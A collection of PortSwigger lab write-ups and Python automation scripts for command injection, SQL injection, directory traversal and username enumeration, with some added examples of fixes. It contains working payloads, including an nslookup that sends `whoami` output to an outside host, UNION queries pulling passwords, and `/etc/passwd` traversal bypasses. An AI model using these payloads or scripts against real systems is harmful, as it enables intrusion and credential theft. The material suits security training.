├── README.md
├── Command Injection
│   ├── Scripts
│   │   ├── Blind (Redirecting output)
│   │   │   ├── README.md
│   │   │   └── script.py
│   │   ├── Blind (Time delays)
│   │   │   ├── README.md
│   │   │   └── script.py
│   │   ├── Blind (OAST)
│   │   │   ├── README.md
│   │   │   └── script.py
│   │   ├── Blind (OAST data exfiltration)
│   │   │   ├── README.md
│   │   │   └── script.py
│   │   └── Simple Case
│   │       ├── script.py
│   │       └── README.md
│   ├── (PRACTITIONER) Lab : Blind OS command injection with time delays.md
│   ├── (APPRENTICE) Lab : OS command injection, simple case.md
│   ├── (PRACTITIONER) Lab : Blind OS command injection with output redirection.md
│   ├── (PRACTITIONER) Lab : Blind OS command injection with out-of-band interaction.md
│   └── (PRACTITIONER) Lab : Blind OS command injection with out-of-band data exfiltration.md
├── SQL injection
│   ├── (PRACTITIONER) Lab : Blind SQL injection with time delays.md
│   ├── (APPRENTICE) Lab : SQL injection vulnerability allowing login bypass.md
│   ├── Scripts
│   │   ├── For Microsoft OR MySQL Database
│   │   │   ├── README.md
│   │   │   └── script.py
│   │   ├── For Oracle Database
│   │   │   ├── README.md
│   │   │   └── script.py
│   │   └── Blind SQLi
│   │       ├── triggeringConditionalResponses.py
│   │       ├── triggeringConditionalErrors.py
│   │       └── usingTimeDelay.py
│   ├── (PRACTITIONER) Lab : SQL injection UNION attack, retrieving data from other tables.md
│   ├── (PRACTITIONER) Lab : SQL injection attack, querying the database type and version on MySQL and Microsoft.md
│   ├── (PRACTITIONER) Lab : SQL injection UNION attack, retrieving multiple values in a single column.md
│   ├── (APPRENTICE) Lab : SQL injection vulnerability in WHERE clause allowing retrieval of hidden data.md
│   ├── (PRACTITIONER) Lab : SQL injection UNION attack, finding a column containing text.md
│   ├── (PRACTITIONER) Lab : SQL injection attack, listing the database contents on non-Oracle databases.md
│   ├── (PRACTITIONER) Lab : SQL injection UNION attack, determining the number of columns returned by the query.md
│   ├── (PRACTITIONER) Lab : SQL injection attack, querying the database type and version on Oracle.md
│   ├── (PRACTITIONER) Lab : Blind SQL injection with out-of-band interaction.md
│   ├── (PRACTITIONER) Lab : Blind SQL injection with out-of-band data exfiltration.md
│   ├── (PRACTITIONER) Lab : Blind SQL injection with conditional responses.md
│   ├── (APPRENTICE) Lab : Blind SQL injection with conditional errors.md
│   └── (PRACTITIONER) Lab : Blind SQL injection with time delays and information retrieval.md
├── Directory traversal
│   ├── (PRACTITIONER) Lab : File path traversal, validation of start of path.md
│   ├── Script
│   │   ├── script.py
│   │   ├── README.md
│   │   └── dirlist.txt
│   ├── (PRACTITIONER) Lab: File path traversal, traversal sequences blocked with absolute path bypass.md
│   ├── (PRACTITIONER) Lab : File path traversal, traversal sequences stripped non-recursively.md
│   ├── (PRACTITIONER) Lab : File path traversal, validation of file extension with null byte bypass.md
│   ├── (APPRENTICE) Lab: File path traversal, simple case.md
│   └── (PRACTITIONER) Lab : File path traversal, traversal sequences stripped with superfluous URL-decode.MD
└── Authentication vulnerabilities
    └── Vulnerabilities in password-based login
        ├── Scripts
        │   ├── Username enumeration via different responses
        │   │   ├── README.md
        │   │   ├── script.py
        │   │   ├── usernames.txt
        │   │   └── passwords.txt
        │   └── Username enumeration via subtly different responses
        │       ├── README.md
        │       ├── script.py
        │       ├── usernames.txt
        │       └── passwords.txt
        ├── Username enumeration via different responses.md
        ├── Username enumeration via subtly different responses.md
        └── Username enumeration via response timing.md

/README.md:
--------------------------------------------------------------------------------
# PortSwigger

This repository contains solutions for the PortSwigger labs, along with scripts that automate them.
--------------------------------------------------------------------------------
/Command Injection/Scripts/Blind (Redirecting output)/README.md:
--------------------------------------------------------------------------------
### USAGE:
```bash
python3 script.py https://ac241f0f1e93147bc00807e5002d0002.web-security-academy.net/
```
Output:
```bash
peter-QkDZWU
```
--------------------------------------------------------------------------------
/SQL injection/(PRACTITIONER) Lab : Blind SQL injection with time delays.md:
--------------------------------------------------------------------------------
Intercept the request using `BurpSuite` and then modify the `TrackingId` cookie, changing it to:

```sql
TrackingId=x'||pg_sleep(10)--
```
`||` is the string concatenation operator (`pg_sleep` tells us the back end is PostgreSQL).
--------------------------------------------------------------------------------
/Command Injection/(PRACTITIONER) Lab : Blind OS command injection with time delays.md:
--------------------------------------------------------------------------------
Intercept the request using `BurpSuite` and then modify the request that submits feedback.

Change the email address to:
```
b||ping+-c+10+127.0.0.1||
```
--------------------------------------------------------------------------------
/SQL injection/(APPRENTICE) Lab : SQL injection vulnerability allowing login bypass.md:
--------------------------------------------------------------------------------
- Go to "My account".
- In the login form, enter `administrator' or 1=1 --` as the username and anything in the password field.
- You will be logged in as `administrator`.
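The login bypass above works because the username is spliced into the SQL text, so the quote closes the string literal and `--` comments out the password check. The following is an added example (not part of this repository) that reproduces the mechanism against a constructed in-memory SQLite table and shows the fix: a parameterized query, where the same input is matched literally and the bypass fails. The table name and sample rows are assumptions made for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the lab's users table (sample data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("administrator", "Adm1n-sample"), ("wiener", "peter")],
    )
    conn.commit()
    return conn


def vulnerable_query(username, password):
    """The query shape behind the lab: user input spliced straight into the SQL text."""
    return (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )


def login_vulnerable(conn, username, password):
    """With 'administrator' or 1=1 --' the WHERE clause becomes
    username = 'administrator' or 1=1, and the password comparison is commented out."""
    row = conn.execute(vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver passes the values separately from the SQL,
    so quotes and comment markers in the input are compared literally with the column."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "administrator' or 1=1 --", "anything"))
    print("safe:      ", login_safe(db, "administrator' or 1=1 --", "anything"))
```

The same fix applies to the category filter lab later in this repository: the `' OR 1=1 --` payload only changes the query's logic when the value is part of the SQL string rather than a bound parameter.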
--------------------------------------------------------------------------------
/SQL injection/Scripts/For Microsoft OR MySQL Database/README.md:
--------------------------------------------------------------------------------
### This script has the following functionalities:

```bash
1. Find number of columns using 'ORDER BY'
2. Find number of columns using 'UNION SELECT'
3. Find columns that contain text
4. Find type and version of database
```
--------------------------------------------------------------------------------
/SQL injection/Scripts/For Oracle Database/README.md:
--------------------------------------------------------------------------------
### This script has the following functionalities:

```bash
1. Find number of columns using 'ORDER BY'
2. Find number of columns using 'UNION SELECT'
3. Find columns that contain text
4. Find type and version of database
```
--------------------------------------------------------------------------------
/SQL injection/(PRACTITIONER) Lab : SQL injection UNION attack, retrieving data from other tables.md:
--------------------------------------------------------------------------------
First, determine the number of columns returned by the query and which columns contain text data, as we did in the previous labs.

Now use the payload:
```sql
'UNION SELECT username,password FROM users--+
```
--------------------------------------------------------------------------------
/Command Injection/(APPRENTICE) Lab : OS command injection, simple case.md:
--------------------------------------------------------------------------------
Intercept the request using `BurpSuite` and then modify the `storeID` parameter, changing it to:

```
1 | whoami
```

`|` is the pipe operator.

E.g. in `A|B`, A and B are executed in parallel, and the standard output of A is sent as the standard input of B.
--------------------------------------------------------------------------------
/Command Injection/Scripts/Blind (Time delays)/README.md:
--------------------------------------------------------------------------------
### USAGE :
```bash
python3 script.py https://ac041faf1e98ea44c038053c00a8006d.web-security-academy.net/
```
Output:
```
delay = 10.767915487289429
Attack successful with Testing Payload : b||ping -c 10 127.0.0.1||
```

__You can change the payload according to your convenience.__
--------------------------------------------------------------------------------
/Directory traversal/(PRACTITIONER) Lab : File path traversal, validation of start of path.md:
--------------------------------------------------------------------------------
Use the payload:
```
/var/www/images/../../../etc/passwd
```

Note: If an application requires that the user-supplied filename must start with the expected base folder, such as `/var/www/images`, then it might be possible to include the required base folder followed by suitable traversal sequences.
--------------------------------------------------------------------------------
/Directory traversal/Script/script.py:
--------------------------------------------------------------------------------
```python
import sys
import time

import requests

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} domain")
    sys.exit(1)

URL = sys.argv[1]

# Each line of dirlist.txt is appended to the base URL and requested in turn.
with open("dirlist.txt", "r") as f:
    for l in f:
        payload = URL + l.strip()
        response = requests.get(payload)
        # l still carries its newline, so end="" avoids a double line break.
        print(f"HTTP Status Code : {response.status_code} || Testing Path : {l}", end="")
        time.sleep(1)
```
--------------------------------------------------------------------------------
/Command Injection/(PRACTITIONER) Lab : Blind OS command injection with output redirection.md:
--------------------------------------------------------------------------------
Intercept the request using `BurpSuite` and then modify the request that submits feedback.

Change the email address to:
```
b||whoami>/var/www/images/whoami.txt||
```
Next, intercept the request that loads an image and change the filename to `whoami.txt`:
```
GET /image?filename=whoami.txt HTTP/1.1
```
--------------------------------------------------------------------------------
/SQL injection/(PRACTITIONER) Lab : SQL injection attack, querying the database type and version on MySQL and Microsoft.md:
--------------------------------------------------------------------------------
First, determine the number of columns returned by the query (`'UNION SELECT NULL,NULL--+`) and which columns contain text data (`'UNION SELECT 'a','a'--+`), as we did in the previous labs.

Now, to query the database type and version on MySQL and Microsoft, use:
```
'UNION SELECT @@version,NULL--+
```
--------------------------------------------------------------------------------
/Command Injection/Scripts/Blind (OAST)/README.md:
--------------------------------------------------------------------------------
**Step 1** : Open `Burp Collaborator Client` and copy the subdomain.

**Step 2** : Run `script.py`. E.g.:
```bash
python3 script.py https://ac401feb1e4e7675c0909bba005f00c7.web-security-academy.net/ 0gh58enmj0vxz279gzeagsoad1jr7g.burpcollaborator.net
```
Output:
```
Poll now!!
```

**Step 3** : Go to Burp Collaborator and press 'Poll now' to confirm that a DNS lookup occurred.
--------------------------------------------------------------------------------
/Command Injection/Scripts/Blind (OAST data exfiltration)/README.md:
--------------------------------------------------------------------------------
**Step 1** : Open `Burp Collaborator Client` and copy the subdomain.

**Step 2** : Run `script.py`. E.g.:
```bash
python3 script.py https://ac401feb1e4e7675c0909bba005f00c7.web-security-academy.net/ 0gh58enmj0vxz279gzeagsoad1jr7g.burpcollaborator.net
```
Output:
```
Poll now!!
```

**Step 3** : Go to Burp Collaborator and press 'Poll now' to confirm that a DNS lookup occurred.
--------------------------------------------------------------------------------
/Directory traversal/Script/README.md:
--------------------------------------------------------------------------------
You may run the script like:
```
python3 script.py https://acc31fd21e19b251c0e1072b00a2000b.web-security-academy.net/image?filename=
```
If you want to print only the paths that returned status code 200, run it like:
```
python3 script.py https://acc31fd21e19b251c0e1072b00a2000b.web-security-academy.net/image?filename= | grep 200
```

PS: You can change `dirlist.txt` according to your convenience and requirements.
--------------------------------------------------------------------------------
/SQL injection/(PRACTITIONER) Lab : SQL injection UNION attack, retrieving multiple values in a single column.md:
--------------------------------------------------------------------------------
First, determine the number of columns returned by the query and which columns contain text data, as we did in the previous labs.

Now use the payload:
```sql
' UNION SELECT NULL,username||'~'||password FROM users--
```

- The double pipe sequence (`||`) is the string concatenation operator in Oracle, and the tilde separates the two values within the single column.
--------------------------------------------------------------------------------
/Command Injection/(PRACTITIONER) Lab : Blind OS command injection with out-of-band interaction.md:
--------------------------------------------------------------------------------
Intercept the request using `BurpSuite` and then modify the request that submits feedback.

Open `Burp Collaborator Client` and copy the subdomain. In this case: `u0vaih5wnq6mdj00bv3gjzudx43urj.burpcollaborator.net`

Change the email address to:
```
b||nslookup+u0vaih5wnq6mdj00bv3gjzudx43urj.burpcollaborator.net||
```

Send it.

Now go to Burp Collaborator and press 'Poll now' to confirm that a DNS lookup occurred.
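The command injection labs above all rely on one server-side pattern: a request parameter is concatenated into a command string that is handed to a shell, so `|`, `||` and `;` end the intended command and start another. The following is an added example (not code from this repository) that makes the mechanism visible without executing anything, by tokenizing the resulting string the way a POSIX shell would, and then shows the fix: an allowlist on the parameter plus an argv list passed to `subprocess.run` without a shell. The command name `stockreport.pl` and the numeric-ID allowlist are assumptions for the demonstration.

```python
import re
import shlex
import subprocess

# Allowlist assumed for this example: the stock checker only ever receives short numeric IDs.
ID_PATTERN = re.compile(r"[0-9]{1,6}")
# Shell control operators that separate one command from the next.
SHELL_OPERATORS = {"|", "||", ";", "&", "&&"}


def vulnerable_command_line(product_id, store_id):
    """The pattern behind the labs: untrusted values spliced into one string for a shell."""
    return f"stockreport.pl {product_id} {store_id}"


def commands_a_shell_would_run(command_line):
    """Tokenize like a POSIX shell (nothing is executed) and split on control operators.
    Returns the list of separate commands the shell would see in the string."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in SHELL_OPERATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def safe_argv(product_id, store_id):
    """Validate both values against the allowlist and build an argv list. Without a
    shell, each list element reaches the program as one literal argument, so even a
    value containing '|' could only ever be a (rejected) argument, never a command."""
    for value in (product_id, store_id):
        if not ID_PATTERN.fullmatch(value):
            raise ValueError(f"rejected id: {value!r}")
    return ["stockreport.pl", product_id, store_id]


def is_accepted(product_id, store_id):
    """Convenience wrapper: does the allowlist let this pair through?"""
    try:
        safe_argv(product_id, store_id)
        return True
    except ValueError:
        return False


def check_stock(product_id, store_id, run=subprocess.run):
    """Run the stock checker with no shell involved. `run` is injectable so the
    validation and argv construction can be exercised without the real script."""
    argv = safe_argv(product_id, store_id)
    return run(argv, shell=False, capture_output=True, text=True, check=False)


if __name__ == "__main__":
    for store in ("1", "1 | whoami", "1;id;"):
        print(repr(store), "->", commands_a_shell_would_run(vulnerable_command_line("1", store)),
              "| accepted:", is_accepted("1", store))
```

The tokenizer shows `1 | whoami` becoming two commands and `1;id;` becoming `stockreport.pl 1 1` followed by `id`, which is exactly what the Simple Case script's output above records. The blind variants (`b||ping ...||`, `b||nslookup ...||`) are the same split with `||` as the operator; the fix is identical, because the allowlist rejects the value and, even if a broader format had to be accepted, an argv list gives the shell no chance to interpret it.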
--------------------------------------------------------------------------------
/Directory traversal/(PRACTITIONER) Lab: File path traversal, traversal sequences blocked with absolute path bypass.md:
--------------------------------------------------------------------------------
Use the following payload:
```
https://acea1f6d1f57fc7bc05a8c5600750075.web-security-academy.net/image?filename=/etc/passwd
```

Note: If an application strips or blocks directory traversal sequences from the user-supplied filename, then it might be possible to bypass the defense using a variety of techniques. You might be able to use an absolute path from the filesystem root, such as `filename=/etc/passwd`, to directly reference a file without using any traversal sequences.
--------------------------------------------------------------------------------
/Directory traversal/(PRACTITIONER) Lab : File path traversal, traversal sequences stripped non-recursively.md:
--------------------------------------------------------------------------------
Use the following payload:
```
https://ac631f491ff3ef5dc03220e000790093.web-security-academy.net/image?filename=....//....//....//etc/passwd
```
Note: If an application strips or blocks directory traversal sequences from the user-supplied filename, then it might be possible to bypass the defense using a variety of techniques. You might be able to use nested traversal sequences, such as `....//` or `....\/`, which will revert to simple traversal sequences when the inner sequence is stripped.
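Every traversal lab in this repository defeats a check that inspects the raw string (a required prefix, a one-pass strip of `../`, an extension check, a filter applied before a second URL-decode) instead of the path that will actually be opened. The following is an added example, not code from this repository, that reproduces each flawed check beside a single correct one: canonicalize first, then enforce the directory boundary and the extension on the canonical path, and never decode twice. It goes beyond the two labs above by also covering the null-byte and double-encoding payloads documented further down; the base directory `/var/www/images` is taken from the write-ups, while the allowed extensions and the sample filenames are constructed for the demonstration.

```python
import posixpath
from urllib.parse import unquote

BASE = "/var/www/images"            # image directory named in the write-ups
ALLOWED_SUFFIXES = (".jpg", ".png")  # assumed allowlist for this example

# Filenames as the application receives them after the web server's single URL-decode.
# Constructed from the payloads in these write-ups; "legit" is a normal request.
SAMPLES = {
    "plain":          "../../../etc/passwd",
    "start_of_path":  "/var/www/images/../../../etc/passwd",
    "absolute":       "/etc/passwd",
    "non_recursive":  "....//....//....//etc/passwd",
    "null_byte":      "../../../etc/passwd\x00.jpg",
    "double_encoded": unquote("%25%32%65%25%32%65%25%32%66" * 3 + "etc/passwd"),
    "legit":          "cat.jpg",
}


def flawed_prefix_check(name):
    """Requires the raw string to start with BASE, then opens it as given."""
    if not name.startswith(BASE):
        return None
    return posixpath.normpath(name)


def flawed_strip_once(name):
    """Removes '../' a single time; '....//' collapses to '../' after the strip."""
    cleaned = name.replace("../", "")
    return posixpath.normpath(posixpath.join(BASE, cleaned))


def flawed_extension_check(name):
    """endswith() on the raw string; a NUL-terminated file API stops at the %00."""
    if not name.endswith(ALLOWED_SUFFIXES):
        return None
    opened = name.split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(BASE, opened))


def flawed_decode_after_filter(name):
    """Filters the once-decoded value, then URL-decodes it again before use."""
    if "../" in name:
        return None
    return posixpath.normpath(posixpath.join(BASE, unquote(name)))


def resolve_image_path(name):
    """Correct check: reject NUL, resolve the full path, and verify that the
    resolved path is still inside BASE and carries an allowed extension.
    Returns the path to open, or None to reject. The input is used as decoded
    by the framework; it is never decoded a second time."""
    if "\x00" in name:
        return None
    candidate = posixpath.normpath(posixpath.join(BASE, name))
    if posixpath.commonpath([BASE, candidate]) != BASE:
        return None
    if not candidate.endswith(ALLOWED_SUFFIXES):
        return None
    return candidate


def audit(samples=SAMPLES):
    """Map each sample to the path the correct check would open (None = rejected)."""
    return {label: resolve_image_path(name) for label, name in samples.items()}


if __name__ == "__main__":
    for label, opened in audit().items():
        print(f"{label:15s} -> {opened}")
```

`posixpath.join` discards the base when the second argument is absolute, which is exactly why the absolute-path payload works against a prefix-free check and why the boundary must be tested after joining. The non-recursive and double-encoded payloads resolve to harmless names under `BASE` and are rejected only by the extension rule, which is the point of checking the canonical path rather than the input.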
--------------------------------------------------------------------------------
/Command Injection/Scripts/Simple Case/script.py:
--------------------------------------------------------------------------------
```python
import sys
import time

import requests

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} domain")
    sys.exit(1)

URL = sys.argv[1]
path = "product/stock/"

# Each line of dictionary.txt is appended to a valid storeId and posted to the
# stock endpoint; any response that is not the usual "not found" is printed.
with open("dictionary.txt", "r") as f:
    for l in f:
        urli = URL + path
        payload = '1' + l.strip()
        data = {'productId': '1', 'storeId': payload}
        response = requests.post(url=urli, data=data)
        if 'not found' not in response.text:
            print(f"Response : {response.text.strip()} || Testing Payload : {l}", end="")
        time.sleep(1)
```
--------------------------------------------------------------------------------
/Directory traversal/(PRACTITIONER) Lab : File path traversal, validation of file extension with null byte bypass.md:
--------------------------------------------------------------------------------
Intercept the request using `BurpSuite` and use the payload:
```
../../../etc/passwd%00.jpg
```

Note: If an application strips or blocks directory traversal sequences from the user-supplied filename, then it might be possible to bypass the defense using a variety of techniques. If an application requires that the user-supplied filename must end with an expected file extension, such as `.png`, then it might be possible to use a null byte to effectively terminate the file path before the required extension.
--------------------------------------------------------------------------------
/SQL injection/(APPRENTICE) Lab : SQL injection vulnerability in WHERE clause allowing retrieval of hidden data.md:
--------------------------------------------------------------------------------
- Select one of the categories given.
- Then observe the URL:
`https://ac4f1f9d1f9cf661c0753d4600e1005a.web-security-academy.net/filter?category=Lifestyle`

To retrieve the unreleased products in the selected category: `category=Lifestyle' --`
```
https://ac4f1f9d1f9cf661c0753d4600e1005a.web-security-academy.net/filter?category=Lifestyle' --
```
To display all products in every category, including categories that are not listed: `category=Lifestyle'+OR+1=1 --`
```
https://ac4f1f9d1f9cf661c0753d4600e1005a.web-security-academy.net/filter?category=Lifestyle%27+OR+1=1%20--
```
--------------------------------------------------------------------------------
/SQL injection/(PRACTITIONER) Lab : SQL injection UNION attack, finding a column containing text.md:
--------------------------------------------------------------------------------
First find the number of columns as we did in Lab 1, then do the following.

Generally, the interesting data that you want to retrieve will be in string form. Having already determined the number of required columns, you can probe each column to test whether it can hold string data by replacing one of the NULL values in the UNION SELECT payload with a string value. In the previous lab you would submit:

```sql
' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
' UNION SELECT NULL,NULL,'a'--
```

Payload:
```sql
' UNION SELECT NULL,'Tz0F22',NULL--
```
--------------------------------------------------------------------------------
/Directory traversal/(APPRENTICE) Lab: File path traversal, simple case.md:
--------------------------------------------------------------------------------
Use the following payload:
```
https://acd21f2c1ec584c7c0a59582003100c1.web-security-academy.net/image?filename=../../../etc/passwd
```
Note : The image files themselves are stored on disk in the location `/var/www/images/`. The application implements no defenses against directory traversal attacks, so an attacker can request the URL above to retrieve an arbitrary file from the server's filesystem. The sequence `../` is valid within a file path, and means to step up one level in the directory structure. The three consecutive `../` sequences step up from `/var/www/images/` to the filesystem root, and so the file that is actually read is `/etc/passwd`.
--------------------------------------------------------------------------------
/Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via different responses/README.md:
--------------------------------------------------------------------------------
**Usage** :
```
python3 auth1p2.py https://acd51fbb1f1bc668c1e5121b00000006.web-security-academy.net/
```
Sample Output:
```
Trying [username : carlos]
Trying [username : root]
Trying [username : admin]
Trying [username : test]
Trying [username : guest]
.
.
.
.
.
Trying [username : appserver]
Trying [username : aq]

Correct username : aq

Trying [username : aq | password : 123456]
Trying [username : aq | password : password]
.
.
.
.
.
Trying [username : aq | password : austin]
Trying [username : aq | password : thunder]
Attack successful
Correct Credentials => [username : aq | password : thunder]
```
--------------------------------------------------------------------------------
/SQL injection/(PRACTITIONER) Lab : SQL injection attack, listing the database contents on non-Oracle databases.md:
--------------------------------------------------------------------------------
First, determine the number of columns: `'UNION SELECT NULL,NULL--+`.

Next, find which column(s) contain text data: `'UNION SELECT 'a','a'--+`.
Next, find the database type and version: `'UNION SELECT version(),'a'--+`, which is `PostgreSQL` in this case.

Find the **database contents** using:
To find table names:
```
'UNION SELECT table_name,NULL FROM information_schema.tables--
```
To find column names:
```
'UNION SELECT column_name,NULL FROM information_schema.columns where table_name='users_otycqm'--
```
To find the username and password:
```
'UNION SELECT username_wkltbr,password_ccjuel FROM users_otycqm--
```
Now you have the credentials; log in to the administrator account.
--------------------------------------------------------------------------------
/Command Injection/Scripts/Simple Case/README.md:
--------------------------------------------------------------------------------
### USAGE :
```bash
python3 script.py https://ac141fd61efc6bd8c0e80e65002500f0.web-security-academy.net/
```
Output will be something like:
```bash
Response : sh: 1: Syntax error: end of file unexpected || Testing Payload : /index.html|id|
Response : 62
uid=12001(peter-MJTGDs) gid=12001(peter) groups=12001(peter) || Testing Payload : ;id;
Response : 62
uid=12001(peter-MJTGDs) gid=12001(peter) groups=12001(peter) || Testing Payload : ;id
Response : 62
uid=12001(peter-MJTGDs) gid=12001(peter) groups=12001(peter) || Testing Payload : ;id;
Response : uid=12001(peter-MJTGDs) gid=12001(peter) groups=12001(peter) || Testing Payload : |id
Response : uid=12001(peter-MJTGDs) gid=12001(peter) groups=12001(peter) || Testing Payload : |/usr/bin/id
.
.
.
.
.
```
--------------------------------------------------------------------------------
/Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via subtly different responses/README.md:
--------------------------------------------------------------------------------
**Usage** :
```
python3 auth1p2.py https://acd51fbb1f1bc668c1e5121b00000006.web-security-academy.net/
```
Sample Output:
```
Trying [username : carlos]
Trying [username : root]
Trying [username : admin]
Trying [username : test]
Trying [username : guest]
.
.
.
.
.
Trying [username : admins]
Trying [username : ads]

Correct username : ads

Trying [username : aq | password : 123456]
Trying [username : aq | password : password]
.
.
.
.
.
Trying [username : ads | password : football]
Trying [username : ads | password : monkey]
Attack successful
Correct Credentials => [username : ads | password : monkey]
```
--------------------------------------------------------------------------------
/Command Injection/Scripts/Blind (OAST)/script.py:
--------------------------------------------------------------------------------
```python
import sys

import requests
from bs4 import BeautifulSoup

if len(sys.argv) != 3:
    print(f"USAGE: {sys.argv[0]} domain burp_collaborator_client")
    sys.exit(1)

URL = sys.argv[1]
client = sys.argv[2]

# Fetch the feedback form to obtain the CSRF token and the session cookie.
path = "feedback"
url = URL + path
response = requests.get(url)

soup = BeautifulSoup(response.content, "html.parser")
csrftoken = soup.find('input', dict(name='csrf'))['value']

path = "feedback/submit"
urli = URL + path
sess_cookie = response.cookies["session"]

# Blind injection: the only signal is the DNS lookup that Collaborator records.
payload = 'b||nslookup ' + client + '||'

data = {'csrf': csrftoken, 'name': 'abc', 'email': payload, 'subject': 'ghi', 'message': 'jkl'}
response = requests.post(url=urli, data=data, headers={"Cookie": "session=" + sess_cookie})
print("Poll now!!")
```
--------------------------------------------------------------------------------
/Command Injection/Scripts/Blind (OAST data exfiltration)/script.py:
--------------------------------------------------------------------------------
```python
import sys

import requests
from bs4 import BeautifulSoup

if len(sys.argv) != 3:
    print(f"USAGE: {sys.argv[0]} domain burp_collaborator_client")
    sys.exit(1)

URL = sys.argv[1]
client = sys.argv[2]

# Fetch the feedback form to obtain the CSRF token and the session cookie.
path = "feedback"
url = URL + path
response = requests.get(url)

soup = BeautifulSoup(response.content, "html.parser")
csrftoken = soup.find('input', dict(name='csrf'))['value']

path = "feedback/submit"
urli = URL + path
sess_cookie = response.cookies["session"]

# The command output becomes the leftmost label of the looked-up name.
payload = 'b||nslookup `whoami`.' + client + '||'

data = {'csrf': csrftoken, 'name': 'abc', 'email': payload, 'subject': 'ghi', 'message': 'jkl'}
response = requests.post(url=urli, data=data, headers={"Cookie": "session=" + sess_cookie})
print("Poll now!!")
```
--------------------------------------------------------------------------------
/Command Injection/(PRACTITIONER) Lab : Blind OS command injection with out-of-band data exfiltration.md:
--------------------------------------------------------------------------------
Intercept the request using `BurpSuite` and then modify the request that submits feedback.

Open `Burp Collaborator Client` and copy the domain. In this case: `slhdq2dusq3iiuxpdc5jqkr970dr1g.burpcollaborator.net`

Change the email address to:
```
b||nslookup+`whoami`.slhdq2dusq3iiuxpdc5jqkr970dr1g.burpcollaborator.net||
```

Send it.

Now go to Burp Collaborator and press 'Poll now'.
Now you will see some DNS interactions that were initiated by the application as the result of your payload.

Observe that the output from your command appears in the subdomain of the interaction, and you can view this within the Burp Collaborator client.

To complete the lab, enter the name of the current user in the `Submit Solution` box on the home page.
--------------------------------------------------------------------------------
/Command Injection/Scripts/Blind (Redirecting output)/script.py:
--------------------------------------------------------------------------------
```python
import sys

import requests
from bs4 import BeautifulSoup

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} domain")
    sys.exit(1)

URL = sys.argv[1]

# Fetch the feedback form to obtain the CSRF token and the session cookie.
path = "feedback"
url = URL + path
response = requests.get(url)

soup = BeautifulSoup(response.content, "html.parser")
csrftoken = soup.find('input', dict(name='csrf'))['value']

path = "feedback/submit"
urli = URL + path
sess_cookie = response.cookies["session"]
# Redirect the command output into the web-accessible images directory.
payload = 'b||whoami>/var/www/images/whoami.txt||'
data = {'csrf': csrftoken, 'name': 'abc', 'email': payload, 'subject': 'ghi', 'message': 'jkl'}
response = requests.post(url=urli, data=data, headers={"Cookie": "session=" + sess_cookie})
# Read the redirected output back through the image endpoint.
path = "image?filename=whoami.txt"
urli = URL + path
response = requests.get(urli)
print(response.text)
```
--------------------------------------------------------------------------------
/Directory traversal/(PRACTITIONER) Lab : File path traversal, traversal sequences stripped with superfluous URL-decode.MD:
--------------------------------------------------------------------------------
Intercept the request using `BurpSuite` and use the payload:
```
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66etc/passwd
```

Note: If an application strips or blocks directory traversal sequences from the user-supplied filename, then it might be possible to bypass the defense using a variety of techniques.
In some contexts, such as in a URL path or the filename parameter of a multipart/form-data request, web servers may strip any directory traversal sequences before passing your input to the application. You can sometimes bypass this kind of sanitization by URL encoding, or even double URL encoding, the `../` characters, resulting in `%2e%2e%2f` or `%252e%252e%252f` respectively. Various non-standard encodings, such as `..%c0%af` or `..%ef%bc%8f`, may also do the trick.

For this challenge, we double encoded `../../../`.
--------------------------------------------------------------------------------
/Command Injection/Scripts/Blind (Time delays)/script.py:
--------------------------------------------------------------------------------
```python
import sys
import time

import requests
from bs4 import BeautifulSoup

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} domain")
    sys.exit(1)

URL = sys.argv[1]

# Fetch the feedback form to obtain the CSRF token and the session cookie.
path = "feedback"
url = URL + path
response = requests.get(url)

soup = BeautifulSoup(response.content, "html.parser")
csrftoken = soup.find('input', dict(name='csrf'))['value']

print("WAIT for 10 sec")

path = "feedback/submit"
urli = URL + path
sess_cookie = response.cookies["session"]
# A 10-second ping: a response delayed by at least that long shows the command ran.
payload = 'b||ping -c 10 127.0.0.1||'
data = {'csrf': csrftoken, 'name': 'abc', 'email': payload, 'subject': 'ghi', 'message': 'jkl'}
start = time.time()
response = requests.post(url=urli, data=data, headers={"Cookie": "session=" + sess_cookie})
end = time.time()
delay = end - start
print("delay = ", delay)
if delay > 10:
    print(f"Attack successful with Testing Payload : {payload}")
```
--------------------------------------------------------------------------------
/SQL injection/(PRACTITIONER) Lab : SQL injection UNION attack, determining the number of columns returned by the query.md:
--------------------------------------------------------------------------------
There are two ways to determine the number of columns required in an SQL injection UNION attack.

1. The first one involves injecting a series of `ORDER BY` queries until an error occurs. The last value before the error indicates the number of columns. For example:
```
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
and so on until an error occurs
```
2. The second one (the most effective in my opinion) involves submitting a series of `UNION SELECT` payloads with an increasing number of NULL values. No error means the number of NULLs matches the number of columns.
```
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
until the error occurs
```

Payload for this lab:
```sql
' UNION SELECT NULL,NULL,NULL--+

or

' ORDER BY 3--+
```
--------------------------------------------------------------------------------
/SQL injection/(PRACTITIONER) Lab : SQL injection attack, querying the database type and version on Oracle.md:
--------------------------------------------------------------------------------
